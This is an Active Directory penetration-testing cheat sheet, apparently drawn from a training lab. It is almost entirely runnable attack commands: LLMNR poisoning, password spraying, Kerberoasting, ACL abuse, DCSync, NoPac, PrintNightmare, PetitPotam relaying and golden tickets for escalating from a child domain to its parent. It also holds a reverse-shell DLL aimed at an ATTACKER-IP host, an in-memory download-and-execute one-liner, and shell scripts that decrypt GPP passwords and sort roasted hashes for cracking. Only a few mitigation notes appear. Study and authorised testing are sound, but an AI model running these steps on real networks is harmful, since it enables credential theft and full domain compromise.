Active Directory Penetration Testing
Initial Enumeration
Domain Reconnaissance
- Query DNS for domain information (nslookup ns1.inlanefreight.com)
- Capture network traffic to see what is talking on the segment (sudo tcpdump -i ens224)
- Analyze LLMNR/NBT-NS/MDNS queries without poisoning them (sudo responder -I ens224 -A); -A is analyze mode, which only listens
- Perform a network ping sweep (fping -asgq 172.16.5.0/23); -a shows alive hosts, -s prints stats, -g generates targets from the CIDR, -q keeps per-target errors quiet
- Run a comprehensive nmap scan against the live hosts (sudo nmap -v -A -iL hosts.txt)
Kerberos User Enumeration
- Clone and compile Kerbrute (sudo git clone https://github.com/ropnop/kerbrute.git, then build with the repo's Makefile)
- Enumerate valid usernames (kerbrute userenum -d DOMAIN.LOCAL --dc 172.16.5.5 users.txt); this does not produce 4625 logon-failure events, but DCs with Kerberos auditing enabled log 4768 for each valid name
- Save the valid usernames for password spraying and AS-REP roasting
LLMNR/NBT-NS Poisoning
Responder Attack
- Review Responder options (responder -h); without -A Responder answers LLMNR/NBT-NS/MDNS queries and captures the authentication that follows
- Capture NTLMv2 hashes by running Responder on the interface facing the targets; captured hashes are written under /usr/share/responder/logs
- Crack captured hashes (hashcat -m 5600 hashes.txt rockyou.txt); 5600 is the NetNTLMv2 mode, and NetNTLMv2 cannot be passed, only cracked or relayed
Windows-based Poisoning (Inveigh)
- Import the Inveigh module (Import-Module .\Inveigh.ps1)
- Review available parameters ((Get-Command Invoke-Inveigh).Parameters)
- Start Inveigh with LLMNR and NBNS spoofing plus console and file logging (Invoke-Inveigh Y -NBNS Y -ConsoleOutput Y -FileOutput Y)
- Use the C# version if PowerShell is constrained or the script is flagged (.\Inveigh.exe)
Mitigation Check
- Disable LLMNR via Group Policy (Computer Configuration > Administrative Templates > Network > DNS Client > Turn off multicast name resolution) and NBT-NS via PowerShell or the adapter's WINS settings on each target; both must be off, since Responder abuses either one
- Verify SMB signing is required on servers and clients so captured hashes cannot be relayed; crackmapexec shows signing:True/False for each host it touches
Password Spraying & Password Policies
Enumerate Password Policy
- Open an SMB NULL session (rpcclient -U "" -N 172.16.5.5)
- Query domain info and the password/lockout policy (rpcclient $> querydominfo, then rpcclient $> getdompwinfo)
- Use enum4linux (enum4linux -P 172.16.5.5)
- Use enum4linux-ng with output files (enum4linux-ng -P 172.16.5.5 -oA results)
- LDAP anonymous bind, then look for minPwdLength, lockoutThreshold and lockOutObservationWindow on the domain object (ldapsearch -h 172.16.5.5 -x -b "DC=DOMAIN,DC=LOCAL"); recent OpenLDAP clients deprecate -h in favour of -H ldap://172.16.5.5
- From Windows: net accounts, or Get-DomainPolicy from PowerView
- Check with valid creds (crackmapexec smb 172.16.5.5 -u user -p pass --pass-pol)
- Record the lockout threshold and observation window before spraying; a threshold of 0 means accounts never lock out
User Enumeration
- Enumerate via enum4linux (enum4linux -U 172.16.5.5)
- Enumerate via rpcclient (rpcclient $> enumdomusers)
- Enumerate via CrackMapExec (crackmapexec smb 172.16.5.5 --users)
- LDAP user search (ldapsearch -h 172.16.5.5 -x -b "DC=DOMAIN,DC=LOCAL" "(&(objectclass=user))"); pull sAMAccountName from the results
- Use windapsearch.py with an anonymous bind (./windapsearch.py --dc-ip 172.16.5.5 -u "" -U)
- All of these need a NULL session or anonymous LDAP bind; without one, fall back to Kerbrute user enumeration
Password Spraying Attacks
- Spray with rpcclient (for u in $(cat users.txt); do rpcclient -U "$u%Password123" -c "getusername;quit" 172.16.5.5 | grep Authority; done); a line containing "Authority Name" means the logon succeeded
- Spray with Kerbrute (kerbrute passwordspray -d domain.local --dc 172.16.5.5 users.txt Password123)
- Spray with CrackMapExec (crackmapexec smb 172.16.5.5 -u users.txt -p Password123); by default it stops at the first hit, --continue-on-success keeps going
- From Windows: DomainPasswordSpray (Invoke-DomainPasswordSpray -Password Welcome1); it pulls the user list and the observation window from the domain itself
- Validate credentials (crackmapexec smb 172.16.5.5 -u user -p pass)
- Stay under the lockout threshold: one password per round across every user, and fewer rounds per observation window than the threshold allows
Enumerating Security Controls
Defensive Enumeration
- Check Windows Defender status (Get-MpComputerStatus); RealTimeProtectionEnabled tells you whether on-access scanning is active
- Review AppLocker policies (Get-AppLockerPolicy -Effective); look at which paths and publishers are allowed for executables and scripts
- Check PowerShell language mode ($ExecutionContext.SessionState.LanguageMode); ConstrainedLanguage blocks most .NET-based offensive tooling, FullLanguage does not
LAPS Enumeration
- Find groups delegated to read LAPS passwords (Find-LAPSDelegatedGroups, from LAPSToolkit)
- Check extended rights on LAPS-managed computers (Find-AdmPwdExtendedRights); any user or group listed here can read the local administrator password
- Get LAPS-managed computers, and the passwords if your account is allowed to read them (Get-LAPSComputers)
Credentialed Enumeration
Remote Access
- RDP connection (xfreerdp /u:user@domain.local /p:pass /v:IP)
- WinRM connection (evil-winrm -i IP -u user); needs membership in Remote Management Users or local admin
- PSExec-style connection, requires admin and writes a service binary to ADMIN$ (psexec.py domain/user:pass@IP)
- WMI connection, requires admin but leaves no service behind (wmiexec.py domain/user:pass@IP)
SMB Enumeration
- Enumerate users with creds (crackmapexec smb IP -u user -p pass --users)
- Enumerate groups (crackmapexec smb IP -u user -p pass --groups)
- Check logged-on users (crackmapexec smb IP -u user -p pass --loggedon-users)
- Enumerate shares (crackmapexec smb IP -u user -p pass --shares)
- Spider a share and list its contents (crackmapexec smb IP -u user -p pass -M spider_plus --share SHARE); results land as JSON under /tmp/cme_spider_plus
- CrackMapExec's successor NetExec (nxc) takes the same arguments
SMBMap
- List shares and permissions (smbmap -u user -p pass -d DOMAIN -H IP)
- Recursive directory listing of a share (smbmap -u user -p pass -H IP -R SYSVOL --dir-only)
BloodHound Collection
- Run the Python collector (sudo bloodhound-python -u user -p pass -ns IP -d domain.local -c all); -ns is the DNS server to use, normally a DC
- Upload the resulting zip and review attack paths in the BloodHound GUI
- Identify high-value targets (shortest paths to Domain Admins, Kerberoastable users, owned principals)
Living Off the Land
Active Directory Module
- List loaded modules (Get-Module)
- Import the AD module, present wherever RSAT is installed (Import-Module ActiveDirectory)
- Gather domain info (Get-ADDomain)
- Find Kerberoastable accounts (Get-ADUser -Filter {ServicePrincipalName -ne "$null"})
- Enumerate trusts (Get-ADTrust -Filter *)
- Enumerate groups (Get-ADGroup -Filter * | select name)
- Get group members (Get-ADGroupMember -Identity "Domain Admins")
PowerView Enumeration
- Get domain info (Get-Domain)
- Enumerate domain controllers (Get-DomainController)
- Enumerate users (Get-DomainUser)
- Enumerate computers (Get-DomainComputer)
- Enumerate groups (Get-DomainGroup)
- Enumerate OUs (Get-DomainOU)
- Find interesting ACLs (Find-InterestingDomainAcl)
- Get group members recursively, which expands nested groups (Get-DomainGroupMember -Identity "Group" -Recurse)
- Find file servers (Get-DomainFileServer)
- Enumerate GPOs (Get-DomainGPO)
- Check domain policy (Get-DomainPolicy)
- Find domain shares (Find-DomainShare)
- Test admin access on the current host (Test-AdminAccess)
- Find hosts where the current user has local admin access (Find-LocalAdminAccess); this touches every computer in the domain, so it is noisy
- Locate where domain users, e.g. Domain Admins, are logged in (Find-DomainUserLocation)
Kerberoasting
Linux-based Kerberoasting
- Install Impacket from a clone of the repository (sudo python3 -m pip install . in the impacket directory)
- List SPNs (GetUserSPNs.py -dc-ip IP DOMAIN/user)
- Request all TGS tickets (GetUserSPNs.py -dc-ip IP DOMAIN/user -request)
- Request a specific user (GetUserSPNs.py -dc-ip IP DOMAIN/user -request-user sqldev)
- Save to file (GetUserSPNs.py -dc-ip IP DOMAIN/user -request-user sqldev -outputfile hashes.txt)
- Crack with Hashcat (hashcat -m 13100 hashes.txt rockyou.txt); 13100 is for RC4 tickets ($krb5tgs$23$), AES tickets ($krb5tgs$17$ / $18$) need modes 19600 / 19700 and crack much more slowly
Windows-based Kerberoasting
- Enumerate SPNs (setspn.exe -Q */*)
- Request a TGS ticket with PowerShell (Add-Type -AssemblyName System.IdentityModel; New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "SPN")
- Extract tickets with Mimikatz (mimikatz # kerberos::list /export); the .kirbi files need converting before hashcat can use them
- Use Rubeus to check stats, including encryption types (.\Rubeus.exe kerberoast /stats)
- Roast a specific user (.\Rubeus.exe kerberoast /user:sqldev /nowrap)
- Roast admin accounts (.\Rubeus.exe kerberoast /ldapfilter:'admincount=1' /nowrap)
- Use PowerView (Get-DomainUser -SPN | Get-DomainSPNTicket -Format Hashcat)
ACL Enumeration & Attacks
ACL Discovery
- Find interesting ACLs across the domain (Find-InterestingDomainAcl); slow in large domains
- Get the SID of the user you control ($sid = Convert-NameToSid username)
- Find objects that user has rights over (Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $sid}); without -ResolveGUIDs the rights show as raw GUIDs
- Read ActiveDirectoryRights and ObjectAceType in the results: GenericAll, GenericWrite, WriteDacl, WriteOwner, User-Force-Change-Password and WriteProperty are the ones that lead somewhere
ACL Abuse Techniques
- Force a password change, given User-Force-Change-Password or GenericAll on the target (Set-DomainUserPassword -Identity user -AccountPassword $pass); $pass must be a S
ecureString
- Add a user to a group, given WriteProperty on member or GenericAll on the group (Add-DomainGroupMember -Identity 'Group' -Members 'user')
- Create a fake SPN for targeted Kerberoasting, given GenericWrite or GenericAll on the account (Set-DomainObject -Identity user -SET @{serviceprincipalname='fake/SPN'})
- Clean up: remove the fake SPN (Set-DomainObject -Identity user -Clear serviceprincipalname)
- Clean up: remove the added group membership (Remove-DomainGroupMember -Identity 'Group' -Members 'user')
- A forced password change cannot be undone and will be noticed; prefer the SPN or group route when the ACL allows it
DCSync Attack
Prerequisites
- Check replication rights on the domain object (Get-DomainObjectACL "DC=domain,DC=local" -ResolveGUIDs) and filter on ObjectAceType
- Verify the account holds both DS-Replication-Get-Changes and DS-Replication-Get-Changes-All; Domain Admins, Enterprise Admins and Domain Controllers have them by default, anything else holding them is a finding
- Confirm network connectivity to a DC over RPC (135/TCP and the dynamic RPC range), which is what the DRSUAPI replication calls use
Execute DCSync
- From Linux (secretsdump.py -just-dc DOMAIN/user@DC-IP); -just-dc-ntlm limits output to NTLM hashes, -just-dc-user DOMAIN/name pulls one account, -outputfile saves the dump
- From Windows with Mimikatz (lsadump::dcsync /domain:DOMAIN /user:Administrator)
- Extract NTLM hashes from the output; each line is domain\user:rid:lmhash:nthash:::, and the nthash is what pass-the-hash needs
- Use VSS for extraction when you have admin on the DC itself (secretsdump.py -use-vss DOMAIN/user@DC-IP); this copies NTDS.dit via a shadow copy instead of replicating
- DCSync shows up on the DC as Event ID 4662 with the replication GUIDs in the properties; expect it to be watched in monitored environments
Privileged Access
Remote Management Groups
- Enumerate Remote Desktop Users on a host (Get-NetLocalGroupMember -GroupName "Remote Desktop Users"); members can RDP in without being admins, add -ComputerName to query a remote host
- Enumerate Remote Management Users (Get-NetLocalGroupMember -GroupName "Remote Management Users"); members can use WinRM/PowerShell Remoting
WinRM/PowerShell Remoting
- Create a PSCredential object (a SecureString password wrapped in System.Management.Automation.PSCredential together with the DOMAIN\user name)
- Connect via Enter-PSSession (Enter-PSSession -ComputerName HOST -Credential $cred)
- Use Evil-WinRM from Linux (evil-winrm -i IP -u user); add -p for a password or -H for an NT hash
SQL Server Attacks
- Import PowerUpSQL (Import-Module .\PowerUpSQL.ps1)
- Enumerate SQL instances via their SPNs (Get-SQLInstanceDomain)
- Query a SQL server (Get-SQLQuery -Instance "IP" -username user -password pass -query 'select @@version'); without -query there is nothing to run
- Connect with mssqlclient.py using Windows authentication (mssqlclient.py DOMAIN/USER@IP -windows-auth)
- Enable xp_cmdshell, which needs the sysadmin role and changes server configuration (SQL> enable_xp_cmdshell)
- Execute OS commands as the SQL service account (xp_cmdshell whoami)
Privilege Escalation Attacks
NoPac (SamAccountName Spoofing, CVE-2021-42278 and CVE-2021-42287)
- Clone the exploit (sudo git clone https://github.com/Ridter/noPac.git)
- Check whether the DC is vulnerable (sudo python3 scanner.py domain/user:pass -dc-ip IP)
- Get a SYSTEM shell on the DC (sudo python3 noPac.py DOMAIN/user:pass -dc-ip IP --impersonate administrator -shell)
- Perform DCSync instead of dropping a shell (sudo python3 noPac.py DOMAIN/user:pass -dc-ip IP -dump -just-dc-user DOMAIN/administrator)
- The exploit adds a machine account, so ms-DS-MachineAccountQuota must be above 0; remove the account afterwards
PrintNightmare (CVE-2021-1675 / CVE-2021-34527)
- Clone the exploit (git clone https://github.com/cube0x0/CVE-2021-1675.git); it needs cube0x0's patched Impacket fork
- Check whether the target exposes the print spooler interfaces (rpcdump.py @IP | egrep 'MS-RPRN|MS-PAR')
- Generate a DLL payload (msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f dll -o payload.dll) and start a matching listener
- Host the DLL on an SMB share (sudo smbserver.py -smb2support Share /path/to/dll)
- Execute the exploit, pointing the spooler at the hosted DLL (sudo python3 CVE-2021-1675.py domain/user:pass@IP '\\ATTACKER-IP\Share\payload.dll')
- The DLL executes as SYSTEM inside the spooler service
PetitPotam
- Start the relay to the CA's web enrollment endpoint (sudo ntlmrelayx.py -smb2support --target http://CA-SERVER/certsrv/certfnsh.asp --adcs --template DomainController)
- Clone PetitPotam (git clone https://github.com/topotam/PetitPotam.git)
- Coerce the DC to authenticate to the relay (python3 PetitPotam.py ATTACKER-IP DC-IP); ntlmrelayx prints the DC's certificate as base64
- Request a TGT for the DC machine account with the certificate, using PKINITtools (gettgtpkinit.py DOMAIN/DC$ -pfx-base64 BASE64-CERT dc.ccache)
- Perform DCSync with the ticket (KRB5CCNAME=dc.ccache secretsdump.py -just-dc-user DOMAIN/administrator -k -no-pass 'DC$'@DC-FQDN)
- This only works while the CA's web enrollment accepts NTLM without Extended Protection and the DC's authentication can be relayed to HTTP
Trust Relationships
Child to Parent Domain
- Enumerate trusts (Get-ADTrust -Filter * or Get-DomainTrust)
- Map all trusts reachable from the current domain (Get-DomainTrustMapping)
- Enumerate users in the child domain (Get-DomainUser -Domain CHILD.PARENT.LOCAL)
- Get the child KRBTGT hash, which requires Domain Admin in the child (mimikatz # lsadump::dcsync /user:CHILD\krbtgt)
- Get the child domain SID (Get-DomainSID)
- Get the Enterprise Admins SID from the parent (Get-DomainGroup -Domain PARENT.LOCAL -Identity "Enterprise Admins"); it is the parent domain SID followed by -519
- Create a Golden Ticket with Mimikatz, putting the Enterprise Admins SID in the ticket's ExtraSids (kerberos::golden /user:hacker /domain:CHILD /sid:CHILD-SID /krbtgt:HASH /sids:EA-SID /ptt)
- Create the same ticket with Rubeus (.\Rubeus.exe golden /rc4:HASH /domain:CHILD /sid:CHILD-SID /sids:EA-SID /user:hacker /ptt)
- Access parent domain resources, e.g. the C$ share on the parent DC; from Linux, Impacket's ticketer.py -extra-sid and raiseChild.py do the same
- This works because SID filtering is not applied between domains of the same forest; across a forest trust it is, and the ExtraSids are stripped
Cross-Forest Trusts
- Enumerate SPN accounts in the external forest (Get-DomainUser -SPN -Domain EXTERNAL.LOCAL)
- Kerberoast across the trust (.\Rubeus.exe kerberoast /domain:EXTERNAL.LOCAL /user:svcaccount /nowrap)
- Find users from your domain sitting in groups of the external domain (Get-DomainForeignGroupMember -Domain EXTERNAL.LOCAL)
- Request TGS tickets from the external domain with Impacket (GetUserSPNs.py -request -target-domain EXTERNAL.LOCAL DOMAIN/user)
- Use BloodHound for trust analysis, collecting each domain separately (bloodhound-python -d DOMAIN -dc DC-HOSTNAME -c all)
- All of this needs a trust in which EXTERNAL.LOCAL trusts your domain (bidirectional, or one-way with your domain as the trusted side)
Miscellaneous Attacks
MS-RPRN Printer Bug
- Check whether the spooler service is reachable on the DC (Get-SpoolStatus -ComputerName DC, from cube0x0's SecurityAssessment.ps1)
- If it is, coerce the DC to authenticate to a host you control: with unconstrained delegation on that host you capture the DC's TGT, otherwise relay the authentication as with PetitPotam
DNS Enumeration
- Dump DNS records via LDAP (adidnsdump -u 'domain\user' ldap://DC-IP); any authenticated user can read the zones
- Resolve unknown records, i.e. entries the account cannot read directly, by querying them over DNS (adidnsdump -u 'domain\user' ldap://DC-IP -r)
Password in Description
- Search user descriptions for passwords and hints (Get-DomainUser * | Select-Object samaccountname,description)
- Check for PASSWD_NOTREQD (Get-DomainUser -UACFilter PASSWD_NOTREQD); such accounts may have a blank password regardless of the domain policy
SYSVOL Enumeration
- List logon scripts in SYSVOL (ls \\DC\SYSVOL\DOMAIN\scripts); every domain user can read SYSVOL
- Search the scripts for hard-coded credentials (net use lines, service installs) and SYSVOL itself for leftover Groups.xml and other preference files
Group Policy Attacks
GPP Password Attacks
- Decrypt a GPP password from a Groups.xml cpassword attribute (gpp-decrypt CPASSWORD); the AES key is public, so every cpassword is recoverable
- Find the relevant CrackMapExec modules (crackmapexec smb -L | grep gpp); gpp_password searches SYSVOL for cpassword entries, gpp_autologin for autologon credentials in Registry.xml
- Extract GPP autologin credentials (crackmapexec smb IP -u user -p pass -M gpp_autologin)
- MS14-025 stopped the editor from writing new cpassword values but did not remove existing ones from SYSVOL
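Why gpp-decrypt works is worth seeing once: the key is fixed and published, the IV is all zeros, and the only wrinkle is that GPP strips the base64 padding. The script below is an added example, not the page's or gpp-decrypt's code; it needs base64, openssl and iconv, assumes one XML element per line (how the Group Policy editor writes these files), and the sample Groups.xml inside it is constructed around the widely published cpassword from the retired Hack The Box machine Active.

```shell
#!/usr/bin/env bash
# Decrypt Group Policy Preferences cpassword values without gpp-decrypt
# (added example, not from the page; needs base64, openssl and iconv).
set -u

# The AES-256 key Microsoft published in MS-GPPREF. Every cpassword in every
# domain is encrypted with this one key and a zero IV, so "encrypted" here
# means nothing more than base64 with extra steps.
GPP_AES_KEY=4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b

# cpassword -> cleartext. GPP strips the base64 '=' padding, which strict
# decoders reject, so it is restored first; the plaintext is UTF-16LE.
gpp_decrypt() {   # gpp_decrypt CPASSWORD
    local c=$1
    while [ $(( ${#c} % 4 )) -ne 0 ]; do c="${c}="; done
    printf '%s' "$c" | base64 -d \
        | openssl enc -d -aes-256-cbc -K "$GPP_AES_KEY" -iv 00000000000000000000000000000000 \
        | iconv -f UTF-16LE -t UTF-8
}

# Walk a preferences XML from SYSVOL (Groups.xml, Services.xml,
# ScheduledTasks.xml, DataSources.xml, Drives.xml, Printers.xml) and print
# "<account> <cleartext>" for every cpassword. Assumes one element per line.
gpp_from_xml() {   # gpp_from_xml FILE
    local line c u
    grep -E 'cpassword="[^"]+"' "$1" | while IFS= read -r line; do
        c=$(printf '%s' "$line" | sed -E 's/.*cpassword="([^"]*)".*/\1/')
        u=$(printf '%s' "$line" | grep -oE '(userName|runAs|accountName)="[^"]*"' \
                | sed -E 's/^[^=]+="//; s/"$//' | head -n 1)
        printf '%s %s\n' "${u:-?}" "$(gpp_decrypt "$c")"
    done
}

# Constructed Groups.xml in the layout GPP writes; the cpassword is the
# widely published sample from the retired Hack The Box machine "Active".
sample_groups_xml() {
    cat <<'EOF'
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>
EOF
}

# Stand-alone use: ./gpp.sh Groups.xml   or   ./gpp.sh -c CPASSWORD
if [ "${1:-}" = "-c" ] && [ $# -eq 2 ]; then gpp_decrypt "$2"; echo
elif [ $# -eq 1 ]; then gpp_from_xml "$1"; fi
```

Point gpp_from_xml at anything smbmap or the spider_plus module pulled out of \\DC\SYSVOL\DOMAIN\Policies; the account name comes from whichever of userName, runAs or accountName the element carries, which covers local users, scheduled tasks and services.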
GPO Enumeration
- List GPOs (Get-DomainGPO | select displayname)
- Check GPO permissions for Domain Users or other broad groups; WriteProperty or GenericAll on a GPO lets you push scheduled tasks or scripts to every computer it applies to
- Identify modifiable GPOs and where they are linked; a GPO linked to the Domain Controllers OU is worth far more than one linked to a lab OU
ASREPRoasting
Discover Vulnerable Accounts
- Find users with DONT_REQ_PREAUTH set (Get-DomainUser -PreauthNotRequired)
- Request the AS-REP hash with Rubeus (.\Rubeus.exe asreproast /user:username /nowrap /format:hashcat)
- Crack the hash (hashcat -m 18200 hash.txt rockyou.txt)
- From Linux, kerbrute prints the AS-REP hash for any such user it finds during enumeration (kerbrute userenum -d domain.local --dc DC-IP users.txt); Impacket's GetNPUsers.py does the same for a known user list
- No credentials are needed for this, only a username, which is what makes it worth trying before any spraying
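Kerberoast and AS-REP roast output both come out as hashcat-style lines, and the mode depends on the Kerberos encryption type in the second $-field, not just on which attack produced the line: an AES ticket fed to -m 13100 is rejected, and cracking AES is far slower than RC4, so RC4 lines should go first. This triage script is an added example covering both the Kerberoasting and ASREPRoasting sections above; it is not code from the page, Impacket, Rubeus or hashcat, and the sample lines inside it are constructed in the shapes GetUserSPNs.py, GetNPUsers.py and Rubeus emit, with placeholder hex instead of real ticket material.

```shell
#!/usr/bin/env bash
# Route Kerberoast and AS-REP roast output to the right hashcat mode (added
# example, not from the page). The second $-field of every hash line is the
# Kerberos encryption type; RC4 (etype 23) cracks fast, AES (17/18) is far
# slower and is rejected outright by the RC4 modes.
set -u

# hashcat mode for one hash line, or "unknown".
hashcat_mode() {   # hashcat_mode HASHLINE
    case $1 in
        '$krb5tgs$23$'*)                      echo 13100 ;;   # Kerberoast, RC4
        '$krb5tgs$17$'*)                      echo 19600 ;;   # Kerberoast, AES128
        '$krb5tgs$18$'*)                      echo 19700 ;;   # Kerberoast, AES256
        '$krb5asrep$23$'*)                    echo 18200 ;;   # AS-REP roast, RC4
        '$krb5asrep$17$'*|'$krb5asrep$18$'*)  echo 32100 ;;   # AS-REP roast, AES (hashcat 6.2.6+)
        *)                                    echo unknown ;;
    esac
}

# Account behind a hash line. TGS lines carry *user$REALM$spn* (RC4) or
# user$REALM$*spn* (AES) after the etype; AS-REP lines carry user@REALM.
hash_account() {   # hash_account HASHLINE
    printf '%s\n' "$1" | sed -E 's/^\$krb5(tgs|asrep)\$[0-9]+\$\*?//; s/[$@:].*//'
}

# Split a roast output file into one file per mode under OUTDIR and print a
# summary line "mode count path" per bucket (sorted by mode). Blank lines and
# anything that is not a Kerberos hash are ignored.
triage() {   # triage HASHFILE OUTDIR
    local line mode f
    mkdir -p "$2"
    while IFS= read -r line; do
        [ -z "$line" ] && continue
        mode=$(hashcat_mode "$line")
        [ "$mode" = unknown ] && continue
        printf '%s\n' "$line" >> "$2/hashes.$mode"
    done < "$1"
    for f in "$2"/hashes.*; do
        [ -e "$f" ] || continue
        mode=${f##*.}
        printf '%s %s %s\n' "$mode" "$(grep -c . "$f")" "$f"
    done | sort -n
}

# Constructed sample lines in the shapes GetUserSPNs.py/GetNPUsers.py and
# Rubeus emit; the hex blobs are placeholders, not real tickets.
sample_hashes() {
    cat <<'EOF'
$krb5tgs$23$*sqldev$INLANEFREIGHT.LOCAL$MSSQLSvc/SQL01.INLANEFREIGHT.LOCAL:1433*$0f1e2d3c4b5a69788796a5b4c3d2e1f0$00112233445566778899aabbccddeeff
$krb5tgs$23$*backupjob$INLANEFREIGHT.LOCAL$backupjob/BACKUP01*$ffeeddccbbaa99887766554433221100$0123456789abcdef0123456789abcdef
$krb5tgs$18$svc_ldap$INLANEFREIGHT.LOCAL$*ldap/LDAP01.INLANEFREIGHT.LOCAL*$0a0b0c0d0e0f10111213141516171819$101112131415161718191a1b1c1d1e1f
$krb5asrep$23$mmorgan@INLANEFREIGHT.LOCAL:1a2b3c4d5e6f708192a3b4c5d6e7f809$f9e8d7c6b5a4938271605f4e3d2c1b0a
EOF
}

# Stand-alone use: ./roast_triage.sh hashes.txt ./buckets
if [ $# -eq 2 ]; then triage "$1" "$2"; fi
```

Run hashcat once per bucket (hashcat -m 13100 buckets/hashes.13100 rockyou.txt, and so on), starting with 13100 and 18200. If every service account comes back as etype 18, the domain has AES-only encryption set on those accounts and the Rubeus /stats output above will show the same thing.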
File Transfer Methods
Quick File Hosting
- Python HTTP server (sudo python3 -m http.server 8001)
- Fetch and run a script in memory with PowerShell (IEX(New-Object Net.WebClient).downloadString('http://IP/file')); nothing touches disk, but the transfer is plain HTTP and visible on the wire
- Impacket SMB server (impacket-smbserver -smb2support Share /path); -smb2support is needed for modern Windows clients